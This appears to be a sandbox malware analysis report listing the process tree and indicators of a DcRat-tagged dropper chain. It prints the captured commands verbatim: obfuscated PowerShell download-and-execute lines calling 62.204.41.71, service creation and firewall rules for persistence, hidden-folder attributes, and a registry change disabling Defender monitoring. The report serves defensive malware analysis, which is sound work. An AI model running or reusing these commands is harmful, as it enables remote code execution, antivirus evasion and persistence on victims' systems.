Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	arnatic_1.exe

Runs .reg file with regedit 1 IoCs

Processes:

Regedit.exe

pid process

4108 Regedit.exe

pid	process
4108	Regedit.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

arnatic_2.exejfiag3g_gg.exe8zeYyAhCLyy4MXuHDcnSZuq6.exe

pid	process
1660	arnatic_2.exe
1660	arnatic_2.exe
2252	jfiag3g_gg.exe
2252	jfiag3g_gg.exe
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
2072	8zeYyAhCLyy4MXuHDcnSZuq6.exe
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3020
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

arnatic_2.exeAFC2.exe

pid process

1660 arnatic_2.exe
1968 AFC2.exe

pid	process
3020

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

arnatic_5.exeMSBuild.exe8zeYyAhCLyy4MXuHDcnSZuq6.exearnatic_7.exed3381037-203a-43e3-9362-b9ca4e152f72.exe8zeYyAhCLyy4MXuHDcnSZuq6.exeWaaSMedicAgent.exeETuSLYkVQqOjTT_usPKsVG0_.exeZxU30FwtSCAQFKpXqBqFaTKQ.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3700	arnatic_5.exe
Token: SeDebugPrivilege	2120	MSBuild.exe
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeDebugPrivilege	2072	8zeYyAhCLyy4MXuHDcnSZuq6.exe
Token: SeDebugPrivilege	3192	arnatic_7.exe
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeDebugPrivilege	4336	d3381037-203a-43e3-9362-b9ca4e152f72.exe
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeDebugPrivilege	4548	8zeYyAhCLyy4MXuHDcnSZuq6.exe
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeDebugPrivilege	5080	WaaSMedicAgent.exe
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeDebugPrivilege	4200	ETuSLYkVQqOjTT_usPKsVG0_.exe
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeDebugPrivilege	1600	ZxU30FwtSCAQFKpXqBqFaTKQ.exe
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeDebugPrivilege	5268	powershell.exe
Token: SeDebugPrivilege	3848	powershell.exe
Token: SeDebugPrivilege	5344	powershell.exe
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeDebugPrivilege	5440	powershell.exe
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeShutdownPrivilege	3020

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

Accostarmi.exe.pif

pid process

4220 Accostarmi.exe.pif
3020
3020
4220 Accostarmi.exe.pif
4220 Accostarmi.exe.pif
3020
3020
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

Accostarmi.exe.pif

pid process

4220 Accostarmi.exe.pif
4220 Accostarmi.exe.pif
4220 Accostarmi.exe.pif

pid	process
4220	Accostarmi.exe.pif
3020
3020
4220	Accostarmi.exe.pif
4220	Accostarmi.exe.pif
3020
3020

pid	process
4220	Accostarmi.exe.pif
4220	Accostarmi.exe.pif
4220	Accostarmi.exe.pif

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

8zeYyAhCLyy4MXuHDcnSZuq6.exe8zeYyAhCLyy4MXuHDcnSZuq6.exeWaaSMedicAgent.exeAeDLshJf0BYumx9Wg7E57LU8.exe

pid	process
2072	8zeYyAhCLyy4MXuHDcnSZuq6.exe
4548	8zeYyAhCLyy4MXuHDcnSZuq6.exe
5080	WaaSMedicAgent.exe
1632	AeDLshJf0BYumx9Wg7E57LU8.exe
5080	WaaSMedicAgent.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exearnatic_7.exearnatic_4.exe8zeYyAhCLyy4MXuHDcnSZuq6.exe

description	pid	process	target process
PID 2388 wrote to memory of 3808	2388	8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe	setup_installer.exe
PID 2388 wrote to memory of 3808	2388	8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe	setup_installer.exe
PID 2388 wrote to memory of 3808	2388	8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe	setup_installer.exe
PID 3808 wrote to memory of 3532	3808	setup_installer.exe	setup_install.exe
PID 3808 wrote to memory of 3532	3808	setup_installer.exe	setup_install.exe
PID 3808 wrote to memory of 3532	3808	setup_installer.exe	setup_install.exe
PID 3532 wrote to memory of 648	3532	setup_install.exe	cmd.exe
PID 3532 wrote to memory of 648	3532	setup_install.exe	cmd.exe
PID 3532 wrote to memory of 648	3532	setup_install.exe	cmd.exe
PID 3532 wrote to memory of 2748	3532	setup_install.exe	cmd.exe
PID 3532 wrote to memory of 2748	3532	setup_install.exe	cmd.exe
PID 3532 wrote to memory of 2748	3532	setup_install.exe	cmd.exe
PID 3532 wrote to memory of 2776	3532	setup_install.exe	cmd.exe
PID 3532 wrote to memory of 2776	3532	setup_install.exe	cmd.exe
PID 3532 wrote to memory of 2776	3532	setup_install.exe	cmd.exe
PID 3532 wrote to memory of 2672	3532	setup_install.exe	cmd.exe
PID 3532 wrote to memory of 2672	3532	setup_install.exe	cmd.exe
PID 3532 wrote to memory of 2672	3532	setup_install.exe	cmd.exe
PID 3532 wrote to memory of 3868	3532	setup_install.exe	cmd.exe
PID 3532 wrote to memory of 3868	3532	setup_install.exe	cmd.exe
PID 3532 wrote to memory of 3868	3532	setup_install.exe	cmd.exe
PID 3532 wrote to memory of 3872	3532	setup_install.exe	cmd.exe
PID 3532 wrote to memory of 3872	3532	setup_install.exe	cmd.exe
PID 3532 wrote to memory of 3872	3532	setup_install.exe	cmd.exe
PID 3532 wrote to memory of 3852	3532	setup_install.exe	cmd.exe
PID 3532 wrote to memory of 3852	3532	setup_install.exe	cmd.exe
PID 3532 wrote to memory of 3852	3532	setup_install.exe	cmd.exe
PID 3852 wrote to memory of 2940	3852	cmd.exe	arnatic_7.exe
PID 3852 wrote to memory of 2940	3852	cmd.exe	arnatic_7.exe
PID 3852 wrote to memory of 2940	3852	cmd.exe	arnatic_7.exe
PID 3868 wrote to memory of 3700	3868	cmd.exe	arnatic_5.exe
PID 3868 wrote to memory of 3700	3868	cmd.exe	arnatic_5.exe
PID 2672 wrote to memory of 1900	2672	cmd.exe	arnatic_4.exe
PID 2672 wrote to memory of 1900	2672	cmd.exe	arnatic_4.exe
PID 2672 wrote to memory of 1900	2672	cmd.exe	arnatic_4.exe
PID 3872 wrote to memory of 2136	3872	cmd.exe	arnatic_6.exe
PID 3872 wrote to memory of 2136	3872	cmd.exe	arnatic_6.exe
PID 3872 wrote to memory of 2136	3872	cmd.exe	arnatic_6.exe
PID 2748 wrote to memory of 1660	2748	cmd.exe	arnatic_2.exe
PID 2748 wrote to memory of 1660	2748	cmd.exe	arnatic_2.exe
PID 2748 wrote to memory of 1660	2748	cmd.exe	arnatic_2.exe
PID 648 wrote to memory of 3528	648	cmd.exe	arnatic_1.exe
PID 648 wrote to memory of 3528	648	cmd.exe	arnatic_1.exe
PID 648 wrote to memory of 3528	648	cmd.exe	arnatic_1.exe
PID 2776 wrote to memory of 2072	2776	cmd.exe	arnatic_3.exe
PID 2776 wrote to memory of 2072	2776	cmd.exe	arnatic_3.exe
PID 2776 wrote to memory of 2072	2776	cmd.exe	arnatic_3.exe
PID 2940 wrote to memory of 3192	2940	arnatic_7.exe	arnatic_7.exe
PID 2940 wrote to memory of 3192	2940	arnatic_7.exe	arnatic_7.exe
PID 2940 wrote to memory of 3192	2940	arnatic_7.exe	arnatic_7.exe
PID 1900 wrote to memory of 776	1900	arnatic_4.exe	jfiag3g_gg.exe
PID 1900 wrote to memory of 776	1900	arnatic_4.exe	jfiag3g_gg.exe
PID 1900 wrote to memory of 776	1900	arnatic_4.exe	jfiag3g_gg.exe
PID 2072 wrote to memory of 1060	2072	8zeYyAhCLyy4MXuHDcnSZuq6.exe	rUNdlL32.eXe
PID 2072 wrote to memory of 1060	2072	8zeYyAhCLyy4MXuHDcnSZuq6.exe	rUNdlL32.eXe
PID 2072 wrote to memory of 1060	2072	8zeYyAhCLyy4MXuHDcnSZuq6.exe	rUNdlL32.eXe
PID 2940 wrote to memory of 3192	2940	arnatic_7.exe	arnatic_7.exe
PID 2940 wrote to memory of 3192	2940	arnatic_7.exe	arnatic_7.exe
PID 2940 wrote to memory of 3192	2940	arnatic_7.exe	arnatic_7.exe
PID 2940 wrote to memory of 3192	2940	arnatic_7.exe	arnatic_7.exe
PID 2940 wrote to memory of 3192	2940	arnatic_7.exe	arnatic_7.exe
PID 1900 wrote to memory of 2252	1900	arnatic_4.exe	jfiag3g_gg.exe
PID 1900 wrote to memory of 2252	1900	arnatic_4.exe	jfiag3g_gg.exe
PID 1900 wrote to memory of 2252	1900	arnatic_4.exe	jfiag3g_gg.exe

Views/modifies file attributes 1 TTPs 3 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exe

pid process

2744 attrib.exe
1324 attrib.exe
776 attrib.exe

pid	process
2744	attrib.exe
1324	attrib.exe
776	attrib.exe

C:\Users\Admin\AppData\Local\Temp\8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe
"C:\Users\Admin\AppData\Local\Temp\8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe"
1⤵
- DcRat
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2388

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3808

C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3532

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_2.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2748

C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_2.exe
arnatic_2.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1660

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_6.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3872

C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_6.exe
arnatic_6.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:2136

C:\Users\Admin\Documents\8zeYyAhCLyy4MXuHDcnSZuq6.exe
"C:\Users\Admin\Documents\8zeYyAhCLyy4MXuHDcnSZuq6.exe"
6⤵
- DcRat
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2072

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yfXLZxBfsx.bat"
7⤵
PID:4720

C:\Windows\SysWOW64\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
8⤵
PID:4868

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
9⤵
PID:4884

C:\Users\Admin\Documents\8zeYyAhCLyy4MXuHDcnSZuq6.exe
"C:\Users\Admin\Documents\8zeYyAhCLyy4MXuHDcnSZuq6.exe"
8⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4548

C:\Documents and Settings\WaaSMedicAgent.exe
"C:\Documents and Settings\WaaSMedicAgent.exe"
9⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5080

C:\Users\Admin\Documents\HZ0653dQL6eKaM3PHHhKvs1i.exe
"C:\Users\Admin\Documents\HZ0653dQL6eKaM3PHHhKvs1i.exe"
6⤵
PID:2120

C:\Users\Admin\AppData\Local\Temp\d3381037-203a-43e3-9362-b9ca4e152f72.exe
"C:\Users\Admin\AppData\Local\Temp\d3381037-203a-43e3-9362-b9ca4e152f72.exe"
7⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:4336

C:\Users\Admin\Documents\4_yza4q88bogYk_cF59XJjyz.exe
"C:\Users\Admin\Documents\4_yza4q88bogYk_cF59XJjyz.exe"
6⤵
- Executes dropped EXE
- Checks processor information in registry
PID:1368

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
7⤵
- Blocklisted process makes network request
PID:4636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 600
7⤵
- Program crash
PID:4688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 944
7⤵
- Program crash
PID:3060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 952
7⤵
- Program crash
PID:5144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 1036
7⤵
- Program crash
PID:972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 868
7⤵
- Program crash
PID:5156

C:\Users\Admin\Documents\ETuSLYkVQqOjTT_usPKsVG0_.exe
"C:\Users\Admin\Documents\ETuSLYkVQqOjTT_usPKsVG0_.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4200

C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe
"C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"
7⤵
PID:1968

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
7⤵
PID:5848

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
7⤵
PID:5304

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2120

C:\Users\Admin\Documents\5RLR8rS_aMkp6xiTBY96V6aV.exe
"C:\Users\Admin\Documents\5RLR8rS_aMkp6xiTBY96V6aV.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:4252

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\uefifces\
7⤵
PID:4788

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ezokegez.exe" C:\Windows\SysWOW64\uefifces\
7⤵
PID:4904

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create uefifces binPath= "C:\Windows\SysWOW64\uefifces\ezokegez.exe /d\"C:\Users\Admin\Documents\5RLR8rS_aMkp6xiTBY96V6aV.exe\"" type= own start= auto DisplayName= "wifi support"
7⤵
PID:4980

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description uefifces "wifi internet conection"
7⤵
PID:5052

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start uefifces
7⤵
PID:2204

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
7⤵
PID:3132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1260
7⤵
- Program crash
PID:4332

C:\Users\Admin\Documents\hO5xKfTb0uXbbkS86n6An9zN.exe
"C:\Users\Admin\Documents\hO5xKfTb0uXbbkS86n6An9zN.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:4148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 1308
7⤵
- Program crash
PID:5568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 1316
7⤵
- Program crash
PID:5872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 1384
7⤵
- Program crash
PID:5052

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "hO5xKfTb0uXbbkS86n6An9zN.exe" /f & erase "C:\Users\Admin\Documents\hO5xKfTb0uXbbkS86n6An9zN.exe" & exit
7⤵
PID:6032

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "hO5xKfTb0uXbbkS86n6An9zN.exe" /f
8⤵
- Kills process with taskkill
PID:5580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 1360
7⤵
- Program crash
PID:4572

C:\Users\Admin\Documents\TovKtHieW7V9aCT7Dk2QoIn9.exe
"C:\Users\Admin\Documents\TovKtHieW7V9aCT7Dk2QoIn9.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4140

C:\Users\Admin\Documents\GlMzB0cjitEHTuadmoJgQMmB.exe
"C:\Users\Admin\Documents\GlMzB0cjitEHTuadmoJgQMmB.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:2032

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
7⤵
PID:2288

C:\Windows\SysWOW64\cmd.exe
cmd
8⤵
PID:6000

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
9⤵
- Enumerates processes with tasklist
PID:1404

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
9⤵
PID:224

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
9⤵
- Enumerates processes with tasklist
PID:5064

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
9⤵
PID:4320

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
9⤵
PID:4632

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
Accostarmi.exe.pif N
9⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4220

C:\Users\Admin\Documents\AeDLshJf0BYumx9Wg7E57LU8.exe
"C:\Users\Admin\Documents\AeDLshJf0BYumx9Wg7E57LU8.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:1632

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
7⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:5268

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
8⤵
PID:5884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 452
9⤵
- Program crash
PID:6040

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
7⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5344

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
8⤵
PID:2192

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
7⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:5440

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c attrib +s +h C:\Users\Admin\AppData\Roaming\OneDrive
8⤵
PID:5176

C:\Windows\SysWOW64\attrib.exe
attrib +s +h C:\Users\Admin\AppData\Roaming\OneDrive
9⤵
- Views/modifies file attributes
PID:2744

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c attrib +s +h C:\ProgramData\OneDrive
8⤵
PID:2448

C:\Windows\SysWOW64\attrib.exe
attrib +s +h C:\ProgramData\OneDrive
9⤵
- Views/modifies file attributes
PID:1324

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -exec bypass start-process C:\Users\Admin\AppData\Roaming\OneDrive\Offer.vbs
8⤵
PID:3976

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\OneDrive\Offer.vbs"
9⤵
PID:3872

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\OneDrive\Offer.bat" "
10⤵
PID:772

C:\Users\Admin\AppData\Roaming\OneDrive\Offer.exe
Offer.exe
11⤵
PID:5804

C:\Windows\SysWOW64\timeout.exe
timeout /t 4
11⤵
- Delays execution with timeout.exe
PID:4256

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
